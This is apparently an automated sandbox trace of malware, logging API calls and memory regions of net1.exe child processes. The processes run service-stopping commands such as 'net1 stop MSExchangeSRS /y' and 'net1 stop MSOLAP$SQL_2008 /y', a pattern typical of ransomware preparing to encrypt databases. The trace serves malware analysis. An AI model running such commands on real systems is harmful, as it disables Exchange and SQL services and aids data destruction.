[0102.138] _wcsicmp (_String1="redirector", _String2="MSExchangeSRS") returned 5 [0102.138] _wcsicmp (_String1="redir", _String2="MSExchangeSRS") returned 5 [0102.138] _wcsicmp (_String1="rdr", _String2="MSExchangeSRS") returned 5 [0102.138] _wcsicmp (_String1="workstation", _String2="MSExchangeSRS") returned 10 [0102.138] _wcsicmp (_String1="work", _String2="MSExchangeSRS") returned 10 [0102.138] _wcsicmp (_String1="wksta", _String2="MSExchangeSRS") returned 10 [0102.138] _wcsicmp (_String1="prdr", _String2="MSExchangeSRS") returned 3 [0102.138] _wcsicmp (_String1="devrdr", _String2="MSExchangeSRS") returned -9 [0102.138] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeSRS") returned -1 [0102.138] _wcsicmp (_String1="server", _String2="MSExchangeSRS") returned 6 [0102.138] _wcsicmp (_String1="svr", _String2="MSExchangeSRS") returned 6 [0102.138] _wcsicmp (_String1="srv", _String2="MSExchangeSRS") returned 6 [0102.138] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeSRS") returned -1 [0102.138] _wcsicmp (_String1="alerter", _String2="MSExchangeSRS") returned -12 [0102.138] _wcsicmp (_String1="netlogon", _String2="MSExchangeSRS") returned 1 [0102.138] _wcsupr (in: _String="MSExchangeSRS" | out: _String="MSEXCHANGESRS") returned="MSEXCHANGESRS" [0102.139] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1dce10 [0102.156] GetServiceKeyNameW (in: hSCManager=0x1dce10, lpDisplayName="MSEXCHANGESRS", lpServiceName=0xffb85750, lpcchBuffer=0xef768 | out: lpServiceName="", lpcchBuffer=0xef768) returned 0 [0102.157] _wcsicmp (_String1="msg", _String2="MSEXCHANGESRS") returned 2 [0102.157] _wcsicmp (_String1="messenger", _String2="MSEXCHANGESRS") returned -14 [0102.157] _wcsicmp (_String1="receiver", _String2="MSEXCHANGESRS") returned 5 [0102.157] _wcsicmp (_String1="rcv", _String2="MSEXCHANGESRS") returned 5 [0102.157] _wcsicmp (_String1="redirector", _String2="MSEXCHANGESRS") returned 5 [0102.157] _wcsicmp (_String1="redir", _String2="MSEXCHANGESRS") returned 5 [0102.157] _wcsicmp (_String1="rdr", _String2="MSEXCHANGESRS") returned 5 [0102.157] _wcsicmp (_String1="workstation", _String2="MSEXCHANGESRS") returned 10 [0102.157] _wcsicmp (_String1="work", _String2="MSEXCHANGESRS") returned 10 [0102.157] _wcsicmp (_String1="wksta", _String2="MSEXCHANGESRS") returned 10 [0102.157] _wcsicmp (_String1="prdr", _String2="MSEXCHANGESRS") returned 3 [0102.157] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGESRS") returned -9 [0102.157] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGESRS") returned -1 [0102.157] _wcsicmp (_String1="server", _String2="MSEXCHANGESRS") returned 6 [0102.157] _wcsicmp (_String1="svr", _String2="MSEXCHANGESRS") returned 6 [0102.157] _wcsicmp (_String1="srv", _String2="MSEXCHANGESRS") returned 6 [0102.157] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGESRS") returned -1 [0102.157] _wcsicmp (_String1="alerter", _String2="MSEXCHANGESRS") returned -12 [0102.157] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGESRS") returned 1 [0102.158] NetServiceControl (in: servername=0x0, service="MSEXCHANGESRS", opcode=0x0, arg=0x0, bufptr=0xef770 | out: bufptr=0xef770) returned 0x889 [0102.158] wcscpy_s (in: _Destination=0xffb880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0102.158] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0102.161] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb85b50, nSize=0x800, Arguments=0xffb87f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0102.162] GetFileType (hFile=0xb) returned 0x2 [0102.163] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef638 | out: lpMode=0xef638) returned 1 [0102.163] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb85b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xef630, lpReserved=0x0 | out: lpBuffer=0xffb85b50*, lpNumberOfCharsWritten=0xef630*=0x1e) returned 1 [0102.172] GetFileType (hFile=0xb) returned 0x2 [0102.172] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef638 | out: lpMode=0xef638) returned 1 [0102.172] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef630, lpReserved=0x0 | out: lpBuffer=0xffb61efc*, lpNumberOfCharsWritten=0xef630*=0x2) returned 1 [0102.173] _ultow (in: _Dest=0x889, _Radix=980640 | out: _Dest=0x889) returned="2185" [0102.173] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb85b50, nSize=0x800, Arguments=0xffb87f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0102.173] GetFileType (hFile=0xb) returned 0x2 [0102.173] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef638 | out: lpMode=0xef638) returned 1 [0102.173] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb85b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xef630, lpReserved=0x0 | out: lpBuffer=0xffb85b50*, lpNumberOfCharsWritten=0xef630*=0x34) returned 1 [0102.174] GetFileType (hFile=0xb) returned 0x2 [0102.174] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef638 | out: lpMode=0xef638) returned 1 [0102.174] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef630, lpReserved=0x0 | out: lpBuffer=0xffb61efc*, lpNumberOfCharsWritten=0xef630*=0x2) returned 1 [0102.174] NetApiBufferFree (Buffer=0x1d4d50) returned 0x0 [0102.175] NetApiBufferFree (Buffer=0x1dc100) returned 0x0 [0102.175] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSRS /y" [0102.175] exit (_Code=2) Process: id = "173" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58bbe000" os_pid = "0x8c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "166" os_parent_pid = "0xa24" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7232 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7233 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7234 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7235 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 7236 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7237 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7238 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7239 start_va = 0xffb60000 end_va = 0xffb92fff entry_point = 0xffb60000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7240 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7241 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7242 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 7243 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7244 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 7245 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7246 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7262 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7263 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7264 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7265 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 7266 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 7267 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7268 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7269 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7270 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7271 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7272 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7273 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7274 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7275 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7276 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7277 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7278 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7279 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7280 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7281 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7282 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7283 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7284 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7308 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 610 os_tid = 0xa48 [0102.249] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af9b0 | out: lpSystemTimeAsFileTime=0x1af9b0*(dwLowDateTime=0xf21d77b0, dwHighDateTime=0x1d48689)) [0102.249] GetCurrentProcessId () returned 0x8c4 [0102.249] GetCurrentThreadId () returned 0xa48 [0102.250] GetTickCount () returned 0x23552 [0102.250] QueryPerformanceCounter (in: lpPerformanceCount=0x1af9b8 | out: lpPerformanceCount=0x1af9b8*=1814916800000) returned 1 [0102.251] GetModuleHandleW (lpModuleName=0x0) returned 0xffb60000 [0102.251] __set_app_type (_Type=0x1) [0102.251] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb79c9c) returned 0x0 [0102.251] __getmainargs (in: _Argc=0xffb84780, _Argv=0xffb84790, _Env=0xffb84788, _DoWildCard=0, _StartInfo=0xffb8479c | out: _Argc=0xffb84780, _Argv=0xffb84790, _Env=0xffb84788) returned 0 [0102.251] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.251] GetConsoleOutputCP () returned 0x1b5 [0102.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb8cec0 | out: lpCPInfo=0xffb8cec0) returned 1 [0102.258] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0102.260] sprintf_s (in: _DstBuf=0x1af958, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0102.260] setlocale (category=0, locale=".437") returned="English_United States.437" [0102.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.310] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.310] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" [0102.310] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af6f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0102.310] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0102.310] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af948 | out: Buffer=0x1af948*=0x214d50) returned 0x0 [0102.310] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af948 | out: Buffer=0x1af948*=0x21c100) returned 0x0 [0102.310] _fileno (_File=0x7fefdba2a80) returned 0 [0102.310] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0102.311] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0102.311] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0102.311] _wcsicmp (_String1="config", _String2="stop") returned -16 [0102.311] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0102.311] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0102.311] _wcsicmp (_String1="file", _String2="stop") returned -13 [0102.312] _wcsicmp (_String1="files", _String2="stop") returned -13 [0102.312] _wcsicmp (_String1="group", _String2="stop") returned -12 [0102.312] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0102.312] _wcsicmp (_String1="help", _String2="stop") returned -11 [0102.312] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0102.312] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0102.312] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0102.312] _wcsicmp (_String1="session", _String2="stop") returned -15 [0102.312] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0102.312] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0102.312] _wcsicmp (_String1="share", _String2="stop") returned -12 [0102.312] _wcsicmp (_String1="start", _String2="stop") returned -14 [0102.312] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0102.312] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0102.312] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0102.312] _wcsicmp (_String1="accounts", _String2="MSOLAP$SQL_2008") returned -12 [0102.312] _wcsicmp (_String1="computer", _String2="MSOLAP$SQL_2008") returned -10 [0102.312] _wcsicmp (_String1="config", _String2="MSOLAP$SQL_2008") returned -10 [0102.312] _wcsicmp (_String1="continue", _String2="MSOLAP$SQL_2008") returned -10 [0102.312] _wcsicmp (_String1="cont", _String2="MSOLAP$SQL_2008") returned -10 [0102.312] _wcsicmp (_String1="file", _String2="MSOLAP$SQL_2008") returned -7 [0102.312] _wcsicmp (_String1="files", _String2="MSOLAP$SQL_2008") returned -7 [0102.313] _wcsicmp (_String1="group", _String2="MSOLAP$SQL_2008") returned -6 [0102.313] _wcsicmp (_String1="groups", _String2="MSOLAP$SQL_2008") returned -6 [0102.313] _wcsicmp (_String1="help", _String2="MSOLAP$SQL_2008") returned -5 [0102.313] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$SQL_2008") returned -5 [0102.313] _wcsicmp (_String1="localgroup", _String2="MSOLAP$SQL_2008") returned -1 [0102.313] _wcsicmp (_String1="pause", _String2="MSOLAP$SQL_2008") returned 3 [0102.313] _wcsicmp (_String1="session", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="sessions", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="sess", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="share", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="start", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="stats", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="statistics", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="stop", _String2="MSOLAP$SQL_2008") returned 6 [0102.313] _wcsicmp (_String1="time", _String2="MSOLAP$SQL_2008") returned 7 [0102.313] _wcsicmp (_String1="user", _String2="MSOLAP$SQL_2008") returned 8 [0102.313] _wcsicmp (_String1="users", _String2="MSOLAP$SQL_2008") returned 8 [0102.313] _wcsicmp (_String1="msg", _String2="MSOLAP$SQL_2008") returned -8 [0102.313] _wcsicmp (_String1="messenger", _String2="MSOLAP$SQL_2008") returned -14 [0102.313] _wcsicmp (_String1="receiver", _String2="MSOLAP$SQL_2008") returned 5 [0102.313] _wcsicmp (_String1="rcv", _String2="MSOLAP$SQL_2008") returned 5 [0102.313] _wcsicmp (_String1="netpopup", _String2="MSOLAP$SQL_2008") returned 1 [0102.313] _wcsicmp (_String1="redirector", _String2="MSOLAP$SQL_2008") returned 5 [0102.313] _wcsicmp (_String1="redir", _String2="MSOLAP$SQL_2008") returned 5 [0102.313] _wcsicmp (_String1="rdr", _String2="MSOLAP$SQL_2008") returned 5 [0102.313] _wcsicmp (_String1="workstation", _String2="MSOLAP$SQL_2008") returned 10 [0102.313] _wcsicmp (_String1="work", _String2="MSOLAP$SQL_2008") returned 10 [0102.313] _wcsicmp (_String1="wksta", _String2="MSOLAP$SQL_2008") returned 10 [0102.313] _wcsicmp (_String1="prdr", _String2="MSOLAP$SQL_2008") returned 3 [0102.313] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SQL_2008") returned -9 [0102.313] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SQL_2008") returned -1 [0102.314] _wcsicmp (_String1="server", _String2="MSOLAP$SQL_2008") returned 6 [0102.314] _wcsicmp (_String1="svr", _String2="MSOLAP$SQL_2008") returned 6 [0102.314] _wcsicmp (_String1="srv", _String2="MSOLAP$SQL_2008") returned 6 [0102.314] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SQL_2008") returned -1 [0102.314] _wcsicmp (_String1="alerter", _String2="MSOLAP$SQL_2008") returned -12 [0102.314] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SQL_2008") returned 1 [0102.314] _wcsupr (in: _String="MSOLAP$SQL_2008" | out: _String="MSOLAP$SQL_2008") returned="MSOLAP$SQL_2008" [0102.314] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x21ce10 [0102.326] GetServiceKeyNameW (in: hSCManager=0x21ce10, lpDisplayName="MSOLAP$SQL_2008", lpServiceName=0xffb85750, lpcchBuffer=0x1af868 | out: lpServiceName="", lpcchBuffer=0x1af868) returned 0 [0102.327] _wcsicmp (_String1="msg", _String2="MSOLAP$SQL_2008") returned -8 [0102.327] _wcsicmp (_String1="messenger", _String2="MSOLAP$SQL_2008") returned -14 [0102.327] _wcsicmp (_String1="receiver", _String2="MSOLAP$SQL_2008") returned 5 [0102.327] _wcsicmp (_String1="rcv", _String2="MSOLAP$SQL_2008") returned 5 [0102.328] _wcsicmp (_String1="redirector", _String2="MSOLAP$SQL_2008") returned 5 [0102.328] _wcsicmp (_String1="redir", _String2="MSOLAP$SQL_2008") returned 5 [0102.328] _wcsicmp (_String1="rdr", _String2="MSOLAP$SQL_2008") returned 5 [0102.328] _wcsicmp (_String1="workstation", _String2="MSOLAP$SQL_2008") returned 10 [0102.328] _wcsicmp (_String1="work", _String2="MSOLAP$SQL_2008") returned 10 [0102.328] _wcsicmp (_String1="wksta", _String2="MSOLAP$SQL_2008") returned 10 [0102.328] _wcsicmp (_String1="prdr", _String2="MSOLAP$SQL_2008") returned 3 [0102.328] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SQL_2008") returned -9 [0102.328] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SQL_2008") returned -1 [0102.328] _wcsicmp (_String1="server", _String2="MSOLAP$SQL_2008") returned 6 [0102.328] _wcsicmp (_String1="svr", _String2="MSOLAP$SQL_2008") returned 6 [0102.328] _wcsicmp (_String1="srv", _String2="MSOLAP$SQL_2008") returned 6 [0102.328] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SQL_2008") returned -1 [0102.328] _wcsicmp (_String1="alerter", _String2="MSOLAP$SQL_2008") returned -12 [0102.328] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SQL_2008") returned 1 [0102.329] NetServiceControl (in: servername=0x0, service="MSOLAP$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x1af870 | out: bufptr=0x1af870) returned 0x889 [0102.330] wcscpy_s (in: _Destination=0xffb880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0102.330] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0102.331] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb85b50, nSize=0x800, Arguments=0xffb87f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0102.333] GetFileType (hFile=0xb) returned 0x2 [0102.334] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af738 | out: lpMode=0x1af738) returned 1 [0102.334] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb85b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af730, lpReserved=0x0 | out: lpBuffer=0xffb85b50*, lpNumberOfCharsWritten=0x1af730*=0x1e) returned 1 [0102.334] GetFileType (hFile=0xb) returned 0x2 [0102.334] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af738 | out: lpMode=0x1af738) returned 1 [0102.335] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af730, lpReserved=0x0 | out: lpBuffer=0xffb61efc*, lpNumberOfCharsWritten=0x1af730*=0x2) returned 1 [0102.336] _ultow (in: _Dest=0x889, _Radix=1767328 | out: _Dest=0x889) returned="2185" [0102.336] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb85b50, nSize=0x800, Arguments=0xffb87f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0102.336] GetFileType (hFile=0xb) returned 0x2 [0102.336] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af738 | out: lpMode=0x1af738) returned 1 [0102.337] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb85b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af730, lpReserved=0x0 | out: lpBuffer=0xffb85b50*, lpNumberOfCharsWritten=0x1af730*=0x34) returned 1 [0102.337] GetFileType (hFile=0xb) returned 0x2 [0102.337] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af738 | out: lpMode=0x1af738) returned 1 [0102.337] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af730, lpReserved=0x0 | out: lpBuffer=0xffb61efc*, lpNumberOfCharsWritten=0x1af730*=0x2) returned 1 [0102.337] NetApiBufferFree (Buffer=0x214d50) returned 0x0 [0102.337] NetApiBufferFree (Buffer=0x21c100) returned 0x0 [0102.337] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SQL_2008 /y" [0102.337] exit (_Code=2) Process: id = "174" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58b85000" os_pid = "0xa5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "167" os_parent_pid = "0x80c" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7247 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7248 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7249 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7250 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 7251 start_va = 0x77670000 end_va = 0x77818fff entry_point = 